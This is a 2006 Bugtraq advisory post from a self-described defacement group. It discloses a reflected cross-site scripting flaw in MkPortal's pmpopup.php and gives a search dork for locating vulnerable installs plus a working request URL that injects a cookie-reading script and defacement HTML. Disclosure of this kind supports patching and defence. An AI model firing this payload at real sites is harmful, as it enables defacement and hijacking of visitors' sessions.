MkPortal Cross Site Scripting (All versions) xSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MkPortal Cross Site Scripting (All versions) xSS
From: vannovax@xxxxxxxxx
Date: 27 Sep 2006 20:27:13 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#By: HanowarS

#mail: vannovax[at]gmail.com

#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz

#web: www.div.com.ve and www.c-group.org

#ALL VERSIONS!!

# Latin American Defacers

############################


Dork:

MKPortal M1.1 Rc1 ©2003-2005 All rights reserved


Hilo:

/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>


Affected File:


pmpopup.php


Example:


http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>

Prev by Date: Comdev Vote Caster 3.1 :) <= Remote File Inclusion
Next by Date: Comdev Contact Form 3.1 :) <= Remote File Inclusion
Previous by thread: Comdev Vote Caster 3.1 :) <= Remote File Inclusion
Next by thread: Comdev Contact Form 3.1 :) <= Remote File Inclusion
Index(es):
- Date
- Thread